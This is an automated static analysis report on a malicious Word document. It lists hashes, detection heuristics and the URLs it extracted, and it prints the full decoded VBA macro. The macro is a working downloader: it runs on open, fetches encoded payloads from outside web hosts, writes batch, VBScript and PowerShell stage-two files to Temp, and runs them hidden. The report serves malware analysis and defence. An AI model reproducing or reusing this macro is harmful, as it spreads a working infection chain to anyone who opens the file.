Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 02a02fb57d6bcc15…

MALICIOUS

Office (OLE)

87.0 KB Created: 2015-06-04 13:01:00 Authoring application: Microsoft Office Word First seen: 2015-06-23
MD5: 17f549d851f4dfc73fcd34604b5b28fb SHA-1: 6f1411ef69f964bea50c612c074124f53c89c39f SHA-256: 02a02fb57d6bcc15f56ad7599b18a3244f9297f92fb56781e2262869165579c4
414 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample contains VBA macros with an AutoOpen subroutine, indicating an attempt to execute malicious code upon opening. The macros utilize CreateObject and Shell calls, and obfuscated string concatenation to construct URLs for downloading a second-stage payload. The reconstructed URLs point to potentially malicious files, suggesting the document acts as a downloader.

Heuristics 14

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 10 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    a = Shell(b, 0)
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Set objHTTP = CreateObject("M" & "SXML2.Ser" & "verX" & "MLH" & "TTP")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set objHTTP = CreateObject("M" & "SXML2.Ser" & "verX" & "MLH" & "TTP")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Quick = GetObject(a)
  • Payload URL assembled from a Chr()/Asc() string expression (6 URLs) high OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Environ(a)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://seawindsadvertising.com/wp-includes/theme-compat/css/lns.txt Referenced by macro
    • http://seawindsadvertising.com/wp-includes/theme-compat/css/89172387.txt123123123Referenced by macro
    • http://savepic.su/1111111.pngReferenced by macro
    • http://savepic.su/2222222.pngReferenced by macro
    • http://searibs.com/wp-includes/js/mediaelement/89172387.txtReferenced by macro
    • http://searibs.com/wp-includes/js/mediaelement/lns.txtReferenced by macro
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8579 bytes
SHA-256: 33c0d7f1ac70273e925128029e103d0ce33bd802387629314d31f1c28446916d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Bguwydgyqbdns_Open()
     
End Sub
Sub Auto_Open()
    Ubydwvtvdagsd
End Sub
Sub Ehyqwbdjnsa()
     
End Sub
Sub Ubydwvtvdagsd()
    
    Dim huwe, auwd As Integer
    Dim retVal As Variant
    Dim HPPSDJ As String
    YUGQYD = Module1.Ubqhwdhwqbd(16735)
    FL2 = YUGQYD
    HPPSDJ = "Temp"
    PH2 = Module1.Bad(HPPSDJ) + "\"
    Dim asjiw As Integer, haus As Integer
    haus = CInt(YUGQYD)
    ygqwd = 1 - haus
    JIQWDJQ = Sgn(ygqwd) + 115
    SSSS = JIQWDJQ
    NDUWGD = "7816278368712"
    
    HYWDAX = "baijkqwhjkqwhejkwqhejkhqwjqhjkwehqwkhwjqkhejkqwhejkqwhewqkhejqwhekjqwht"
    JWIDJIAAA = Chr(SSSS - 10 - 6) + "a"
    HUYFEA = JWIDJIAAA + Right(HYWDAX, 1)
    WKDOQ = NDUWGD
    PSFL = FL2 + "" & "." + "p" + "" + Chr(Asc("s")) _
    + _
    "1"
    SSS = Chr(SSSS + 1)
    VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
    huwe = 1
    BAFL = FL2 + Chr(Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0) + HUYFEA
    
    INTG = "" & "o" & "bject"
    KIWD = Chr(110 + Sgn(Len(BAFL))) + "d" + "" + "ul" + "e"
    AFTG = "m" & KIWD
    
    SXEE = Chr(46)
    SXAA = Chr(101)
    SXE = SXEE & SXAA & "xe"
    GNG = ".png"
    
    PHT = "" & "ht" & "t" & "p://" & ""
    SPIC = "" & "sav" & "epi" + "c.su/"
     
    PSPTH = PH2 + PSFL
    VBPTH = PH2 + VBFL
    BAPTH = "kasjdklasjdkljas ldj asdsad"
    ABPTH = PH2 + BAFL
    BAPTH = ABPTH
    
    Dim DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer
    
    DRT = 310
    BFT = 311
    CFT = 312
    DFT = 313
    EFT = 314
    
    Dim PBIn As String, asdwq As String, MIWDWQ As String
    
    CDDD = "89172387.txt"
    LNSS = "lns.txt"
    STT1 = "seawindsadvertising.com/wp-includes/theme-compat/css/"
    STT2 = "searibs.com/wp-includes/js/mediaelement/"
    
    PBIn = PHT + STT1 + CDDD
    CONT = Module1.Price(PBIn)
    asdwq = CONT
    
     HQUWDAAA = "0"
    If (asdwq = "") Then
        PBIn = PHT + STT2 + CDDD
        CONT = Module1.Price(PBIn)
        asdwq = CONT
        HQUWDAAA = "1"
    End If
    
    CONT = Module1.Quqhwdbyas(asdwq)
     
    TVT10 = Module1.Kort(CONT, "text10")
    TVT20 = Module1.Kort(CONT, "text20")
    TVT21 = Module1.Kort(CONT, "text21")
    TVT30 = Module1.Kort(CONT, "text30")
    TVT31 = Module1.Kort(CONT, "text31")
    XPT1 = Module1.Kort(CONT, "stext1")
    XPT2 = Module1.Kort(CONT, "stext2")
    XPT3 = Module1.Kort(CONT, "stext3")
    
    
    WVR = Module1.Bad("USE" & "RPROFILE")
    UQHWDIHQW = "hjhkjh 1j2hghjg1jkh3g 1 g2j3g12kjh3g12hj "
    hufehu1 = InStr(WVR, "sers\")
    
    Dim hudhw As Integer
    Dim ghdAdd(1 To 3)
    ghdAdd(1) = "1"
    ghdAdd(2) = "0"
    ghdAdd(3) = "0"
    
    If (hufehu1 <> 0) Then
        ghdAdd(1) = "2"
    Else
        ghdAdd(2) = "3"
    End If
    
    JHWQUD = Join(ghdAdd)
    hudhw = Val(JHWQUD)
    
    Module1.WaitFor (1)
    
    MIWDWQ = PHT + STT1 + LNSS
    If (HQUWDAAA = "1") Then
        MIWDWQ = PHT + STT2 + LNSS
    End If
    
    SEXX = Module1.Price(MIWDWQ)
    
    PSTB = PBIn + "123123123"
    MSTAR1 = SPIC + "1111111" + GNG
    MSTAR2 = SPIC + "2222222" + GNG
    STAR1 = PHT + MSTAR1
    STAR2 = PHT + MSTAR2
    FFQ = "8"
    FF = FFQ + SXE
    
     If (hudhw = 130) Then
     Open BAPTH For Output As #DRT
     Print #DRT, XPT1
     Print #DRT, ":uhydgqy"
     Print #DRT, "set trfd=" + Chr(34) + PH2 + Chr(34)
     Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
     Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
     Print #DRT, XPT2
     Close #DRT
     
     Module1.WaitFor (1)
     
     Open VBPTH For Output As #BFT
     Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
     Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
     Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
     Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
     Print #BFT, XPT3
     Close #BFT
     
     Module1.WaitFor (1)
     NTH1 = Module1.Freat(retVal, BAPTH)
     
     End If
     
     
     
     If (hudhw = 200) Then
     ZPQSKD = FL2
     Open PSPTH For Output As #CFT
     Print #CFT, "$ujdkwq = 'jqwdb';"
     Print #CFT, "$stat = 'ht'+'tp://'+'" + MSTAR2 + "';"
     Print #CFT, "$ggtt = '" + SEXX + "';"
     Print #CFT, "$pths = '" + PH2 + "';"
     
     Print #CFT, "$wehs = '" + ZPQSKD + "';"
     Print #CFT, "$nnm = '" + FFQ + "';"
     Print #CFT, TVT10
     Close #CFT
     
     Open VBPTH For Output As #DFT
     Print #DFT, TVT30
     Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
     Print #DFT, TVT31
     Close #DFT
    
     Open BAPTH For Output As #EFT
     Print #EFT, "@echo off"
     Print #EFT, TVT20
     Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
     Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
     Print #EFT, TVT21
     Close #EFT
     Module1.WaitFor (1)
     
     NTH2 = Module1.Freat(retVal, BAPTH)
     
     End If
    
    
    JUW = Chr(47)
    AKK = Chr(60)
    ZKK = ">"
    NTH3 = Module2.Nybdqwd(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
    NTH4 = Module2.Nybdqwd(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
    NTH5 = Module2.Nybdqwd(AKK + INTG + ZKK, "", 3)
    NTH6 = Module2.Nybdqwd(AKK + JUW + INTG + ZKK, "", 3)
    NTH7 = Module2.Nybdqwd(AKK + AFTG + ZKK, "", 3)
    NTH8 = Module2.Nybdqwd(AKK + JUW + AFTG + ZKK, "", 3)

 
    
  
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    JQIWJDWQ = "sakjd klasjdkajskld iuqwhduhdiuqhdiwuhd "
    Auto_Open
End Sub





Attribute VB_Name = "Module2"

Public Function Nybdqwd(a As String, b As String, c As Integer)
Dim selectedText As String
Dim ytss, selRange As Range
Set ytss = ActiveDocument.Range
With ytss.Find
.Text = a
.MatchWholeWord = True
ytss.Find.Execute
ytss.Collapse direction:=wdCollapseEnd
YQGDUYQWGDW = "jwqkhjekqweh wquihe uiqweg qwyuegw quyeg quywgeqwyu euyqgw eqw"
Set selRange = ActiveDocument.Range
HAUSHDJHGDGW = "jhqwhe iuqwgeyqw euyqgweyuqg weuyqwg euqywgeuyqwgeuyqwg e"
selRange.Start = ytss.End
.Text = b
.MatchWholeWord = True
.Execute
ytss.Collapse direction:=wdCollapseStart
selRange.End = ytss.Start
If (c = 1) Then
    selectedText = selRange.Delete
End If
If (c = 2) Then
    selRange.Font.Color = wdColorBlack
End If
If (c = 3) Then
    With ytss.Find
    .Text = a
    .Replacement.Text = Chr(1 + 1 + 28 + 2)
    .Wrap = wdFindContinue
    .Execute Replace:=wdReplaceAll
    End With
End If
End With
End Function






Attribute VB_Name = "Module1"

Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub


Public Function Price(a As String)
Dim objHTTP As Object
Dim PriceSheetURL As String
PriceSheetURL = a
Set objHTTP = CreateObject("M" & "SXML2.Ser" & "verX" & "MLH" & "TTP")
objHTTP.Open "GET", PriceSheetURL
objHTTP.Send ""
Price = objHTTP.ResponseText
End Function
Public Function Freat(a As Variant, b)
a = Shell(b, 0)
Freat = a
End Function
Public Function Ubqhwdhwqbd(a As Integer)
Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
End Function

Public Function Kort(a, b As String)
Dim krd, tent As Integer
UQWD = "<"
NDUW = "" & ">"
krd = InStr(1, a, UQWD + b + NDUW) + 8
tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
KLMN = Mid(a, krd, tent)
HUQHWDA = KLMN
Kort = HUQHWDA
End Function

Public Function Quqhwdbyas(ByVal strData As String) As String
    Dim objXML As Object
    Dim objNode As Object
    Set objXML = CreateObject("" & "MSXML2.DOMDocument")
    Set objNode = objXML.createElement("b6" + "4")
    objNode.DataType = "bin.base64"
    objNode.Text = strData
    WUDHA = objNode.nodeTypedValue
    Quqhwdbyas = WUDHA
    Set objNode = Nothing
    Set objXML = Nothing
    MWDQ = ""
End Function

Public Function Dtgt(a As String)
Quick = GetObject(a)
End Function

Public Function Quick(a As String)
Quick = GetObject(a)
End Function

Public Function Bad(a As String)
Bad = _
Environ(a)
End Function











Attribute VB_Name = "Module3"